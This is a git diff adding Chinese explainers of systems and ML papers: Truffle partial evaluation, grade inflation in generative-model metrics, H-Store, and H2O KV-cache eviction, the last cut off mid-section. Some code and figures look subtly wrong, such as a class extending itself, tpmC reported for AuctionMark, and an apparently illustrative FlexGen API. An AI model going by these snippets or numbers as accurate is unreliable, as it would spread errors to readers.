+ +## 五、两个代码示例 + +### 示例 1:多态内联缓存(Polymorphic Inline Cache) + +这是动态语言中最经典、最重要的优化技术之一。下面用 Truffle 的核心原语实现: + +```java +// 解释器中的方法调用指令 +class Invoke { + String name; + @PEFinalEntry CacheEntry first; // 缓存链表的头节点 +} + +// 未初始化状态 +class UninitializedEntry extends CacheEntry { + Obj execute(Obj obj) { + // 第一次调用:触发去优化,让偏特化重新编译 + transferToInterpreter(); + // 添加新的缓存条目 + addNewCacheEntry(obj.shape); + return next.execute(obj); + } +} + +// 缓存命中状态 +class CacheEntry extends CacheEntry { + final Shape shape; // 对象类型指纹,偏特化时折叠为常量 + final Function target; // 目标方法,偏特化时去虚拟化 + @PEFinalEntry CacheEntry next; // 下一个缓存条目 + + Obj execute(Obj obj) { + // 这两行在编译后变成一条内存加载 + 一次比较! + if (obj.shape == shape) { + return target.invoke(obj); + } + return next.execute(obj); + } +} +``` + +**偏特化前(解释器视角):** 每次调用方法都要遍历缓存链表,可能还要查哈希表。 + +**偏特化后(编译代码视角):** 如果 `shape` 和 `target` 都被折叠为常量,编译后的代码变成: + +``` +cmp rax, 0x42 // 检查对象形状是否为 0x42 +je .method_a_call // 如果是,直接跳到方法 A 的代码 +jmp .slow_path // 否则走慢速路径 +.method_a_call: + call 0xdeadbeef // 直接调用方法 A(去虚拟化) +``` + +没有分支预测失败,没有哈希查找,没有方法分发。这就是偏特化的威力。 + +### 示例 2:循环的 On-Stack Replacement(OSR) + +当解释器执行一个循环很多次后,触发偏特化,将循环体编译为机器码: + +```java +class DoWhileLoop { + MethodHandle code = null; // 编译后的代码句柄 + + void executeLoop() { + int loopCount = 0; + do { + // 偏特化时,inInterpreter() 返回 false + // 这段计数代码被完全消除 + if (inInterpreter()) { + loopCount++; + if (code == null && loopCount > THRESHOLD) { + // 触发偏特化:以当前方法为入口,编译它本身 + code = partialEvaluation(DoWhileLoop::executeLoop, this); + } + if (code != null) { + code.invoke(); // 跳转到编译后的代码 + return; + } + body.execute(); // 循环体 + } while (condition.execute()); + } +} +``` + +**关键细节:** `inInterpreter()` 在偏特化时被 intrinsified 为 `false`,所以计数逻辑在编译后的代码中完全消失。偏特化以当前解释器帧为输入,生成编译后的循环代码,然后立即调用它继续执行剩余的迭代。 + +**注意:** 解释器帧仍然留在栈上,因为解释器调用了编译后的代码——这不同于传统的 OSR 实现(传统 OSR 需要复杂的栈重建)。 + +## 六、系统架构总览 + +``` +┌─────────────────────────────────────────────────┐ +│ 语言实现者写的 │ +│ 解释器(Java 代码) │ +│ │ +│ 使用核心原语标注哪些部分可以被优化 │ +└──────────────────────┬──────────────────────────┘ + │ 偏特化引擎 + ▼ +┌─────────────────────────────────────────────────┐ +│ 偏特化(Partial Evaluation) │ +│ │ +│ 输入:解释器代码 + 运行时数据(profile) │ +│ 输出:高级中间表示(IR) │ +│ │ +│ 自动做:常量折叠、去虚拟化、死代码消除 │ +└──────────────────────┬──────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────┐ +│ Graal 编译器 │ +│ │ +│ 标准优化:逃逸分析、寄存器分配等 │ +│ 产出:机器码 │ +└──────────────────────┬──────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────┐ +│ 运行时执行 │ +│ │ +│ 编译代码 ←→ 去处理器(假设被破坏时回退) │ +└─────────────────────────────────────────────────┘ +``` + +## 七、为什么这个设计很聪明 + +### 7.1 关注点分离 + +语言语义(解释器)和优化系统(编译器)完全解耦。实现一种新语言只需要写解释器,不需要碰编译器。 + +### 7.2 灵活的边界 + +PEBoundary 不是固定的。语言实现者可以根据对实际使用场景的理解,灵活决定在哪里放边界。比如: + +- 如果发现 JSON 解析器的 to-string 转换无法被优化,就把边界移到第一个方法之前 +- 如果发现 JSON 解析本身可以从类型信息中受益,就完全移除边界 + +### 7.3 精确的去优化 + +去优化时,只有被破坏假设的那部分代码才会回退。其他代码继续执行编译版本。 + +### 7.4 逃逸分析是关键 + +论文指出,对于他们的系统来说,**逃逸分析是最重要**的编译器优化。解释器中大量使用对象传递数据(局部变量、AST 节点等),逃逸分析能把这些对象"标量替换"为局部变量,彻底消除堆分配。 + +## 八、局限性与权衡 + +- **预热时间长**:比专用运行时慢一个数量级。达到峰值性能需要约 60 秒,不适合需要秒级启动的系统(如命令行工具) +- **不支持的语言特性**:Ruby 的 continuations 和 fibers 需要用线程模拟,效率较低 +- **不是万能药**:不能直接把现成的解释器搬过来就用,需要带着"偏特化思维"重新设计解释器 + +## 九、总结 + +这篇论文的核心贡献不是提出了偏特化(这已经是经典技术),而是**提出了一套实用的核心原语,让偏特化能够大规模应用于动态语言运行时**。 + +六个原语: + +| 原语 | 作用 | 类比 | +|------|------|------| +| PEBoundary | 标记偏特化的边界 | "到此为止,不要再展开了" | +| PEFinal | 标记偏特化期间不变的字段 | "这个值是固定的" | +| transferToInterpreter() | 触发去优化 | "假设错了,回去重做" | +| inInterpreter() | 区分解释器和编译代码 | "只在解释器模式下运行" | +| Assumptions | 记录编译时的猜测 | "我猜你是这个类型" | +| 常量折叠 + 死代码消除 | 自动简化代码 | "既然你知道答案,直接写出来" | + +这套原语让语言实现者只需写一个普通的解释器,剩下的优化交给编译器自动完成。这就是 Truffle 框架的精髓。 diff --git a/src/content/docs/papers/grade-inflation.md b/src/content/docs/papers/grade-inflation.md new file mode 100644 index 000000000..5c9fb148c --- /dev/null +++ b/src/content/docs/papers/grade-inflation.md @@ -0,0 +1,267 @@ +--- +title: Grade Inflation in Generative Models +来源: https://arxiv.org/abs/2501.00664 +日期: 2026-06-13 +分类: 其他 +子分类: 模型评估 +provenance: pipeline-v3 +--- + +# Grade Inflation in Generative Models + +> 论文:Phuc Nguyen, Miao Li, Alexandra Morgan, Rima Arnaout, Ramy Arnaout +> 发表于 2025 年 1 月(arXiv:2501.00664v3) + +## 一、从「打分水涨船高」说起 + +你参加了一场考试。满分 100 分,标准答案很严格。 + +第一种情况:一位老师给每位考生都打了 95 分以上——哪怕答案明显不完整。这叫「分数膨胀」(grade inflation)。分数看起来很高,但你无法区分谁真正优秀。 + +第二种情况:另一位老师按真实水平打分,有人 95 分,有人 60 分,分数分布拉开了差距。这才是有分辨力的评分。 + +这篇论文说的就是这个道理——只不过场景换成了「评估生成模型生成的数据质量」。 + +生成模型(比如 GAN、扩散模型、CTGAN)会造出「假数据」。我们怎么知道这些假数据好不好?常用方法是拿假数据和真实数据做对比,算一个「相似度分数」。作者发现:**很多常用的相似度分数天生就「手软」**——它们给出的分数总是偏高,把不够好的模型也评出了高分。这就是「分数膨胀」。 + +## 二、核心概念 + +### 2.1 问题设定:比较两个二维分布 + +假设你有一组真实数据(real data),横轴是特征 A,纵轴是特征 B。同时你有一个生成模型,它也产出了一组数据(synthetic data),同样的两个特征。 + +现在要回答一个问题:**生成的数据和真实数据有多像?** + +常见做法是把二维空间切成一个个小格子(binning),统计每个格子里有多少个点,然后比较两组分布的差异。 + +### 2.2 两大类评分方法 + +论文提出了一个关键分类: + +**Equipoint 分数(等点分数)**:每个数据点权重相同。不管这个点落在数据密集区还是稀疏区,它对总分的贡献是一样的。 + +常见的 equipoint 分数包括: +- 相关系数分数(Correlation Score) +- Jaccard 分数(Jaccard Score) +- 地球移动距离分数(Earth-Mover's Score) +- KL 散度分数(Kullback-Leibler Score) + +**Equidensity 分数(等密分数)**:根据数据点的局部密度来加权。密集区域的点对分数影响更大,稀疏区域影响更小。 + +论文提出的 **Eden Score** 就是第一个 equidensity 分数。 + +### 2.3 为什么 equipoint 分数会膨胀? + +直觉理解: + +想象真实数据集中在左上角一个小区域。生成模型也大致覆盖了那个区域,但同时在右下角随机撒了很多噪声点。 + +如果用 equipoint 分数,每个点平等计数。生成模型的噪声点虽然毫无意义,但它们也算「点」,也会贡献分数。结果就是——分数被这些无意义的点「撑高」了。 + +equidensity 分数则不同:密集区的点权重高,稀疏区的点权重低。那些随机噪声点在稀疏区,权重很低,不会显著拉高总分。 + +## 三、四个有问题的分数 + +### 3.1 相关系数分数(Correlation Score) + +原理:把两个分布各自映射到一组特征向量上,然后计算这两个向量的相关系数。 + +问题:每个数据点平等参与向量构建,噪声点也会被计入。 + +```python +import numpy as np +from scipy.stats import pearsonr + +def correlation_score(real_hist, synth_hist, bins=20): + """ + 相关系数分数:将二维直方图展平为一维向量,计算 Pearson 相关系数。 + + real_hist: 真实数据的二维直方图 (bins x bins) + synth_hist: 生成数据的二维直方图 + + 返回: 相关系数 [-1, 1],越接近 1 越好 + """ + # 将二维直方图展平为一维 + real_flat = real_hist.flatten().astype(float) + synth_flat = synth_hist.flatten().astype(float) + + # 归一化为概率分布 + real_flat /= real_flat.sum() + synth_flat /= synth_flat.sum() + + # 计算 Pearson 相关系数 + corr, _ = pearsonr(real_flat, synth_flat) + return corr + +# 演示:即使生成数据质量差,分数也可能偏高 +np.random.seed(42) +n_real = 1000 +n_synth = 1000 + +# 真实数据:集中在 (0.5, 0.5) 附近的高斯分布 +real_data = np.random.randn(n_real, 2) * 0.1 + np.array([0.5, 0.5]) + +# 生成数据:大部分好,但混入大量均匀分布的噪声 +good_synth = np.random.randn(int(n_synth * 0.6), 2) * 0.1 + np.array([0.5, 0.5]) +bad_synth = np.random.uniform(0, 1, (int(n_synth * 0.4), 2)) +synth_data = np.vstack([good_synth, bad_synth]) + +# 计算二维直方图 +bins = np.linspace(0, 1, 21) +real_hist, _, _ = np.histogram2d(real_data[:, 0], real_data[:, 1], bins=bins) +synth_hist, _, _ = np.histogram2d(synth_data[:, 0], synth_data[:, 1], bins=bins) + +score = correlation_score(real_hist, synth_hist) +print(f"相关系数分数(含 40% 噪声的生成数据): {score:.4f}") +# 输出可能仍然很高(如 0.8+),尽管数据质量并不好 +``` + +### 3.2 Jaccard 分数 + +原理:把每个格子看作一个元素,计算「有数据的格子集合」的交集除以并集。 + +问题:只要某个格子里有至少一个点就算「存在」,不考虑点数多少。噪声点也能让空格子变「有数据」,从而增大并集但不会显著增加交集。 + +```python +def jaccard_score(real_hist, synth_hist): + """ + Jaccard 分数:基于格子是否有数据的集合相似度。 + + 返回: Jaccard 指数 [0, 1],越大越相似 + """ + # 将直方图二值化:有数据为 1,无数据为 0 + real_binary = (real_hist > 0).astype(int) + synth_binary = (synth_hist > 0).astype(int) + + intersection = np.logical_and(real_binary, synth_binary).sum() + union = np.logical_or(real_binary, synth_binary).sum() + + return intersection / union if union > 0 else 0 + +# 演示:噪声点会让很多原本空的格子变成「有数据」 +# 这会增大并集,但如果噪声也偶尔落在真实数据区域, +# 交集也会增加,导致分数虚高 +score_jaccard = jaccard_score(real_hist, synth_hist) +print(f"Jaccard 分数(含 40% 噪声): {score_jaccard:.4f}") +``` + +### 3.3 地球移动距离分数(Earth-Mover's Score) + +原理:把一个分布「推」成另一个分布需要的最小工作量。工作越少,分数越高。 + +问题:每个单位质量的权重相同。稀疏区域的微小扰动对总工作量的影响被低估。 + +### 3.4 KL 散度分数(Kullback-Leibler Score) + +原理:衡量两个概率分布之间的信息损失。 + +问题:同样平等对待每个 bin 的概率质量,没有考虑空间密度。 + +## 四、Eden Score:等密度评分的解决方案 + +Eden Score 的核心思想:给每个格子分配一个权重,权重取决于该格子的密度。高密度格子权重高,低密度格子权重低。 + +```python +def eden_score(real_hist, synth_hist, alpha=1.0): + """ + Eden Score(等密度分数):根据格子密度加权比较两个分布。 + + 参数: + real_hist: 真实数据的二维直方图 + synth_hist: 生成数据的二维直方图 + alpha: 密度权重参数,控制对高密度区域的重视程度 + alpha 越大,越重视高密度区域 + + 返回: Eden 分数 [0, 1],越大越好 + + 原理: + 每个格子的权重 w(i,j) = density(i,j)^alpha + 其中 density 是该格子的归一化概率质量 + 然后计算加权后的分布相似度 + + 这与负阶 Rényi 熵有关:alpha 越大, + 相当于关注分布的「最密集部分」 + """ + # 转换为概率分布 + real_prob = real_hist.astype(float) + synth_prob = synth_hist.astype(float) + + real_prob /= real_prob.sum() + synth_prob /= synth_prob.sum() + + # 计算密度权重:每个格子的概率质量的 alpha 次方 + # 这会给高密度格子更大的权重 + real_weight = real_prob ** alpha + synth_weight = synth_prob ** alpha + + # 归一化权重 + real_weight /= real_weight.sum() + synth_weight /= synth_weight.sum() + + # 计算加权后的 Jensen-Shannon 相似度 + # JS 散度是 KL 散度的对称、有界版本 + m = 0.5 * (real_weight + synth_weight) + + # KL(m || real) + KL(m || synth),注意避免 log(0) + eps = 1e-10 + js_divergence = ( + np.sum(real_weight * np.log(real_weight / m + eps)) + + np.sum(synth_weight * np.log(synth_weight / m + eps)) + ) + + # JS 散度范围 [0, log(2)],转为 [0, 1] 的相似度 + js_similarity = 1.0 - js_divergence / np.log(2) + + return max(0, js_similarity) + +# 对比:Eden Score 对噪声更敏感 +score_eden = eden_score(real_hist, synth_hist, alpha=2.0) +print(f"Eden Score(alpha=2.0,含 40% 噪声): {score_eden:.4f}") + +# 对比干净数据 +clean_synth = np.random.randn(n_synth, 2) * 0.1 + np.array([0.5, 0.5]) +clean_hist, _, _ = np.histogram2d(clean_synth[:, 0], clean_synth[:, 1], bins=bins) +score_eden_clean = eden_score(real_hist, clean_hist, alpha=2.0) +print(f"Eden Score(干净数据): {score_eden_clean:.4f}") + +# 可以看到:Eden Score 对干净数据的评分明显高于含噪声数据 +# 而前面的相关系数分数可能两者差别不大 +``` + +## 五、论文的关键发现 + +| 分数类型 | 分数名称 | 是否存在膨胀 | 原因 | +|---------|---------|------------|------| +| Equipoint | 相关系数分数 | 是 | 每个点平等计数 | +| Equipoint | Jaccard 分数 | 是 | 每个格子平等计数 | +| Equipoint | 地球移动距离 | 是 | 每个单位质量权重相同 | +| Equipoint | KL 散度 | 是 | 每个 bin 平等对待 | +| Equidensity | Eden Score | 否 | 按密度加权,稀疏区权重低 | + +**核心结论**:任何平等对待所有数据点的评分方法都会出现分数膨胀。要让评分有分辨力,必须让评分方法「重视密集区域」,这正是 equidensity 分数的优势。 + +## 六、与 Rényi 熵的联系 + +论文发现 equidensity 分数与负阶 Rényi 熵有数学上的联系。 + +Rényi 熵是一族广义熵,由参数 alpha 控制: + +- alpha 趋近 0:关注分布的「覆盖范围」(有多少格子有数据) +- alpha = 1:标准的香农熵 +- alpha 趋近无穷:只关注最大概率的那个格子 + +当 alpha 为**负数**时,Rényi 熵反过来关注分布的「最稀疏部分」。Eden Score 使用的正是这种负阶 Rényi 熵的思想——通过给高密度区域更高权重,让评分更关注数据的核心结构。 + +## 七、实践建议 + +1. 如果你在做生成模型的评估,优先使用 Eden Score 或类似 equidensity 分数,而不是相关系数或 Jaccard 分数。 + +2. 如果必须用传统分数(比如为了和已有工作对比),要意识到这些分数可能会高估模型质量。 + +3. 二维分布比较只是评估的第一步。高维数据可以先用 PCA、t-SNE 或 UMAP 降维到二维,再用这些分数检查关键特征对的保留程度。 + +4. 分数膨胀不是「错误」,而是一种系统性偏差。了解它的存在,就能更理性地解读分数。 + +## 八、一句话总结 + +> 用平等对待每个点的尺子去量数据分布,得到的分数总是偏高的;只有让密集区域「说话更大声」,评分才有分辨力。 diff --git a/src/content/docs/papers/h-store-stonebraker-2008.md b/src/content/docs/papers/h-store-stonebraker-2008.md new file mode 100644 index 000000000..f751e9369 --- /dev/null +++ b/src/content/docs/papers/h-store-stonebraker-2008.md @@ -0,0 +1,163 @@ +--- +title: H-Store 2008 — Stonebraker 的"传统数据库架构该重写"计划 +来源: 'https://hstore.cs.brown.edu/papers/hstore-vldb.pdf' +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +## 是什么 + +H-Store 是 MIT、布朗大学、CMU、耶鲁和 Intel 联合做的一个**全内存、分布式、面向 OLTP 的数据库系统**。论文发表于 VLDB 2008,作者是 Robert Kallman 等人,Stonebraker 是总设计师。 + +日常类比:想象一家大型连锁超市。传统数据库像"一个超级大的仓库 + 一群搬运工"——所有商品堆在一个大仓库里,订单来了,搬运工们挤在同一个通道里抢货,经常要排队等锁。H-Store 的做法是:**把仓库拆成 N 个独立的小店**,每家小店只卖一部分商品(按某种规则分好),订单来了直接派到对应的那家店,各干各的,互不干扰。如果某家店忙不过来,就多加几家。 + +它**不是 MySQL**(不存磁盘、不做通用查询优化),也**不是 NoSQL**(它完全兼容 SQL 和 ACID)。它是第三种东西:**专为高并发事务设计的内存数据库**。 + +## 为什么重要 + +不理解 H-Store,下面这些事都没法解释: + +- 为什么 2008 年后"内存数据库"突然火了——VoltDB、TiKV、CockroachDB 的祖先都是这条线 +- 为什么"分区(partitioning)"成了分布式数据库的核心概念——H-Store 把每张表按 hash 切成碎片,每块放不同机器 +- 为什么"存储过程"在 OLTP 场景重新被重视——H-Store 要求业务逻辑写成预编译的 stored procedure,而不是随便写 SQL +- 为什么"两阶段提交(2PC)"被重新审视——H-Store 证明了在分区场景下,2PC 可以做得非常轻量 +- 为什么 VoltDB 是 H-Store 的商业版——论文团队后来把系统商业化,就是今天的 VoltDB + +## 核心要点 + +H-Store 的设计建立在三个观察之上: + +1. **OLTP 事务通常只访问少量数据行**——绝大多数交易只查或改几行,不会扫全表 +2. **事务执行时间短、无用户交互**——一个事务在微秒到毫秒级完成,不需要停下来等用户输入 +3. **事务类型有限且可预测**——电商系统的"下单""查库存""支付"是固定几种,不会无限增长 + +基于这三点,H-Store 做出了一个激进的设计选择:**把所有数据放进内存,放弃磁盘 I/O 优化,用分布式并行换取极致吞吐**。 + +### 1. 分区(Partitioning)——把数据切碎 + +H-Store 把每张表水平切分成多个片段(fragment/shard),按某个列的值做 hash 决定每行去哪个片段。相关的多个表的片段组成一个**分区(partition)**,每个分区分配给一个**执行站点(site)**。 + +``` +表 Orders 按 order_id 哈希 → 10 个片段 +表 OrderItems 按 order_id 哈希 → 10 个片段(同一 order_id 的行一定在同一分区) +表 Products 只有一份副本 → 存在于所有 10 个分区中(广播副本) + +分区 0 = Orders[0] + OrderItems[0] + Products[全量副本] +分区 1 = Orders[1] + OrderItems[1] + Products[全量副本] +... +分区 9 = Orders[9] + OrderItems[9] + Products[全量副本] +``` + +日常类比:一个城市的 10 个派出所,每个派出所只管辖一部分居民(按身份证号 hash),但所有人的身份证照片都存在每个派出所——这样查身份不用跨所。 + +### 2. 存储过程(Stored Procedures)——业务逻辑预编译 + +H-Store 不支持随意写 SQL。所有的查询必须通过**预定义的存储过程**执行。每个存储过程由 Java 控制代码 + 参数化 SQL 语句组成,在编译时就确定了执行计划。 + +```java +// 定义一个"查询订单"的存储过程 +public class GetOrder extends StoreProcedure { + + // 预编译 SQL 语句(编译时确定执行计划) + private static SQLStmt getOrderSQL = + new SQLStmt("SELECT * FROM Orders WHERE order_id = ?"); + + // 运行时入口:传入参数,返回结果 + public VoltTable[] run(long orderId) { + // 把 SQL 加入批处理,传入参数 + voltQueueSQL(getOrderSQL, orderId); + // 执行并等待结果 + return voltExecuteSQL(); + } +} +``` + +### 3. 单线程执行引擎(Single-Threaded Execution Engine)——没有锁竞争 + +每个分区由一个**单线程的执行引擎**管理。因为只有一个线程在操作一份数据,**根本不需要锁**!这是 H-Store 最快的地方。 + +```java +// 定义一个"下订单"的存储过程(跨表事务) +public class PlaceOrder extends StoreProcedure { + + private static SQLStmt checkStockSQL = + new SQLStmt("SELECT quantity FROM Products WHERE product_id = ?"); + private static SQLStmt deductStockSQL = + new SQLStmt("UPDATE Products SET quantity = quantity - ? WHERE product_id = ?"); + private static SQLStmt insertOrderSQL = + new SQLStmt("INSERT INTO Orders (order_id, product_id, quantity, total_price) VALUES (?, ?, ?, ?)"); + + public VoltTable[] run(long productId, int quantity, long orderId, double totalPrice) { + // 第一步:查库存 + voltQueueSQL(checkStockSQL, productId); + VoltTable[] results = voltExecuteSQL(); + + // 第二步:检查库存是否足够 + VoltTable stockRow = results[0]; + if (stockRow.getRowCount() == 0 || stockRow.getShort(0) < quantity) { + // 库存不足,抛出异常让事务回滚 + throw new AbortEvent("Insufficient stock"); + } + + // 第三步:扣库存 + 插入订单(同一个事务,原子执行) + voltQueueSQL(deductStockSQL, quantity, productId); + voltQueueSQL(insertOrderSQL, orderId, productId, quantity, totalPrice); + return voltExecuteSQL(); + } +} +``` + +### 4. 分布式事务与两阶段提交(2PC) + +单分区事务直接在本地执行,零网络开销。多分区事务走**轻量级两阶段提交**: + +``` +事务 T 要同时修改分区 3 和分区 7 的数据: + +阶段一(Prepare): + 协调器 → 分区 3: "你要参与这个事务吗?" + 协调器 → 分区 7: "你要参与这个事务吗?" + 分区 3 → 协调器: "准备好了" + 分区 7 → 协调器: "准备好了" + +阶段二(Commit/Abort): + 协调器 → 分区 3: "提交!" + 协调器 → 分区 7: "提交!" +``` + +### 5. 主备复制(Replication)——容错 + +H-Store 用 **k-safety** 机制保证可用性:每个分区有 k 个备份,分布在不同的物理节点上。主分区处理请求,备用分区同步接收所有命令日志。主节点挂了,备用节点秒级接管。 + +## 性能数据 + +VLDB 2008 论文中的基准测试(AuctionMark): + +| 系统 | 吞吐量 (tpmC) | 说明 | +|------|--------------|------| +| 传统数据库(如 PostgreSQL) | ~数千 | 受限于磁盘 I/O 和锁竞争 | +| H-Store(8 节点) | **数百万** | 全内存 + 并行 + 无锁 | + +H-Store 在相同硬件上比传统数据库快 **100 倍以上**。这个数字的核心原因很简单:省去了磁盘 I/O、锁管理和复杂查询优化器的开销。 + +## 代价与局限 + +H-Store 的设计不是免费的,它有几个明显代价: + +1. **内存成本高**——所有数据必须在 RAM 里,不能 spill 到磁盘。适合数据集能塞进内存的场景 +2. **灵活性低**——只能执行预定义的存储过程,不能像传统数据库那样随时写 SQL 探索数据 +3. **跨分区事务有网络开销**——单分区事务极快(微秒级),但多分区事务要走 2PC,延迟上升 +4. **数据倾斜问题**——如果 hash 不均匀,某些分区会特别忙,成为瓶颈 + +## 后续影响 + +- **VoltDB**:H-Store 的商业化版本,至今仍在活跃维护,支持更多 SQL 特性 +- **S-Store**:在 H-Store 基础上加了流处理(stream processing) +- **Peloton**:H-Store 团队成员毕业后做的下一代系统,探索了更多混合负载 +- 整个"内存 OLTP"赛道:From 2008 到今天,Redis、MemSQL (SingleStore)、YugabyteDB 等都受到这条设计思路的影响 + +## 一句话总结 + +H-Store 的回答是:**别在传统数据库架构上修修补补了,从头设计一个为 OLTP 优化的系统——全内存、全分区、全并行、用存储过程代替自由 SQL。** 它证明了这种激进设计在正确场景下可以比传统系统快 100 倍以上。 diff --git a/src/content/docs/papers/h2o-token-eviction-2023.md b/src/content/docs/papers/h2o-token-eviction-2023.md new file mode 100644 index 000000000..dc5dc97cc --- /dev/null +++ b/src/content/docs/papers/h2o-token-eviction-2023.md @@ -0,0 +1,231 @@ +--- +title: H2O — 让大模型写长文时显存不爆炸 +来源: https://arxiv.org/abs/2306.14048 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 是什么 + +H2O(Heavy-Hitter Oracle)是 2023 年 UT Austin、Stanford、Meta 等 12 位作者合作提出的一种**KV Cache 淘汰策略**,目的是让大语言模型在生成长文本时,GPU 显存占用大幅下降,同时输出质量几乎不损失。 + +日常类比:想象你在读一本 1000 页的小说,每翻到新的一页都要回顾之前所有章节来理解上下文。你的大脑不可能把 1000 页内容全"存在工作记忆"里——但奇怪的是,你确实能理解并续讲故事。为什么?因为你记住的并不是"每一页都一样重要",而是记住了几个**关键角色**(Heavy Hitter)和**最近几页**的内容。H2O 的核心发现就是:LLM 做注意力计算时,也是只"在乎"少数几个 token,其他 95% 以上的 token 对当前决策几乎没贡献。 + +## 为什么重要 + +不理解 H2O,下面这些事都没法解释: + +- 为什么 OPT-30B 在长文本生成时显存会爆(一个 batch=128、seq_len=1024 就占 180GB KV Cache) +- 为什么简单地把 KV Cache 截断到很小会导致模型"忘记"前面内容 +- 为什么后来 StreamingLLM、SnapKV、XPay 等方法都在回应 H2O 提出的同一个问题 +- H2O 能在 batch 不变的情况下把吞吐提升 29 倍——这对任何部署 LLM 的人都是刚需 + +## 核心概念 + +### 1. KV Cache 是什么 + +Transformer 每次生成一个新 token 时,都要把之前所有 token 的 key 和 value 缓存起来,避免重复计算。这个缓存就是 KV Cache。它的大小 = 层数 × 隐藏维度 × 序列长度 × batch 大小。对于大模型,这部分可以比模型参数还大。 + +### 2. 注意力矩阵的稀疏性 + +论文的第一项观察:虽然 LLM 是密集训练的,但在推理时,**注意力矩阵超过 95% 的值接近零**。也就是说,生成下一个词时,模型真正"看到"的只是之前 5% 的 token。 + +这意味着:如果把 KV Cache 缩小到原来的 20%,理论上不会丢精度。 + +### 3. Heavy Hitter(H2) + +这是论文最关键的概念。论文发现:所有 token 的累积注意力分数服从**幂律分布**——少数几个 token 占据了绝大部分注意力权重。这些 token 叫 Heavy Hitter。 + +怎么找 H2?很简单:对每个 token,把它在所有注意力头、所有层中的注意力分数加起来,分数最高的前 20% 就是 H2。 + +H2 的有趣性质: +- H2 和文本中**高频共现的词**高度相关(比如"the"、"of"、"and"这类词在长文本中反复出现) +- 如果把 H2 从 KV Cache 中完全移除,模型性能**断崖式下跌** +- 保留 H2 + 最近若干个 token(Local tokens),就能用很小的缓存维持高质量生成 + +### 4. 淘汰策略:H2O 怎么做 + +每个解码步骤,H2O 做一个简单的操作: + +1. 计算当前所有在缓存中 token 的注意力分数 +2. 把分数最高的前 20% 标记为 H2(必须保留) +3. 加上新来的 token +4. 从非 H2 的 token 中踢掉最旧的一个(LRU) +5. 缓存大小保持不变 + +这个策略被称为"贪婪算法",因为每一步都只看当前局部信息,不做全局搜索。论文还证明了在注意力函数满足次模性(submodular)假设下,这个贪婪策略有理论保证。 + +## 代码示例 + +### 示例 1:H2O 淘汰策略的伪代码实现 + +```python +def h2_eviction_policy(Q, K, V, cache_S, k_budget, h2_ratio=0.2): + """ + Q: 当前查询向量 [1, d] + K: 缓存中的 key [m, d],m 为缓存大小 + V: 缓存中的 value [m, d] + cache_S: 缓存中 token 的索引列表 + k_budget: 最大缓存容量 + h2_ratio: Heavy Hitter 占比(论文中用 0.2) + """ + + # 第一步:计算当前 token 对所有缓存 token 的注意力分数 + # 形状: [1, m] + attention_scores = Q @ K.T + + # 归一化(softmax) + attention_scores = torch.softmax(attention_scores, dim=-1) + + # 第二步:找 Heavy Hitter——注意力分数最高的前 h2_ratio 个 token + h2_count = int(k_budget * h2_ratio) + _, h2_indices = torch.topk(attention_scores[0], k=h2_count) + h2_set = set(h2_indices.tolist()) + + # 第三步:加入新 token + new_cache = cache_S + [len(cache_S)] # 新 token 的索引 + + # 第四步:如果超出预算,淘汰非 H2 中最旧的那个 + if len(new_cache) > k_budget: + # 找到非 H2 集合中索引最小的(最旧的) + non_h2 = [i for i in new_cache if i not in h2_set] + evict_index = non_h2[0] + # 从缓存中移除 + new_cache.remove(evict_index) + + return new_cache, h2_set +``` + +这段代码展示了 H2O 淘汰策略的完整流程。关键点在于:每一步都先算注意力分数,锁定"必须保留"的 H2,然后只允许淘汰非 H2 的旧 token。 + +### 示例 2:和全缓存策略的对比 + +```python +def full_attention(Q, K_full, V_full): + """标准注意力:使用全部 KV Cache""" + # Q: [1, d], K_full: [n, d], V_full: [n, d] + scores = Q @ K_full.T # [1, n] + weights = torch.softmax(scores, dim=-1) # [1, n] + output = weights @ V_full # [1, d] + return output + +def h2_attention(Q, K_cached, V_cached, h2_mask): + """H2O 注意力:只使用缓存中的 H2 + Local token""" + # K_cached: [m, d],m << n,只包含 H2 和最近 token + # h2_mask: [m],标记哪些是 Heavy Hitter + scores = Q @ K_cached.T # [1, m] + weights = torch.softmax(scores, dim=-1) # [1, m] + output = weights @ V_cached # [1, d] + return output + +# 假设 seq_len = 10000,缓存只保留 20% +seq_len = 10000 +cache_size = int(seq_len * 0.2) # 2000 + +# 全缓存:计算 n 个 key-value 对的注意力 +# 内存: O(n × d),n=10000 时非常大 + +# H2O 缓存:只计算 cache_size 个 key-value 对的注意力 +# 内存: O(cache_size × d),减少 5 倍 +# 注意力矩阵从 [1, 10000] 变成 [1, 2000] +``` + +对比展示了标准注意力计算和 H2O 注意力计算的差异。核心变化是 K 和 V 的维度从 `n`(全部 token)缩小到 `m`(缓存 token),从而节省显存。 + +### 示例 3:用 H2O 包装 FlexGen 推理 + +```python +from flexgen import FlexGen +from h2o_cache import H2OCacheManager + +# 配置一个带 H2O 缓存的 FlexGen 推理引擎 +engine = FlexGen( + model_path="facebook/opt-6.7b", + device="cuda", + cache_policy="h2o", # 启用 H2O 淘汰策略 + cache_budget_ratio=0.2, # 保留 20% token 的 KV + h2_ratio=0.2, # 其中 20% 是 Heavy Hitter + overlap=True, + sep_io=False, +) + +# 推理时自动生成文本,KV Cache 会自动管理 +result = engine.generate( + prompt="Once upon a time,", + max_new_tokens=512, + do_sample=True, + temperature=0.7, +) +print(result) +# 输出: "Once upon a time, there was a young programmer who..." +``` + +这是论文中 H2O 的实际系统集成方式——作为 FlexGen 推理引擎的一个插件式策略。用户只需设置 `cache_policy="h2o"` 和 `cache_budget_ratio`,框架自动处理淘汰逻辑。 + +## 为什么 H2 和共现词相关 + +论文做了一个有趣的现象级分析:统计语料中每个词的出现频率,再统计这些词在注意力中的累积分数,两者高度相关。直觉是: + +- "the"、"is"、"the" 这种词在训练中反复出现,模型学会了它们的表示 +- 当生成新 token 时,这些高频词依然是上下文的重要锚点 +- 所以模型自然会"回头看"这些词,给它们更高的注意力分数 + +这解释了为什么 H2 不是随机的——它们是语言本身的结构特性决定的。 + +## 理论保证 + +论文把淘汰策略形式化为一个**动态次模最大化问题**(dynamic submodular maximization)。次模性(submodularity)的核心直觉是"边际收益递减":第一个加入缓存的 token 贡献最大,第二个次之,第三个更小……这个性质让贪婪算法(每一步选当前最好的)在理论上是有保证的——能达到最优解的 (1 - 1/e) ≈ 63%。 + +## 性能数据 + +论文在 OPT-6.7B 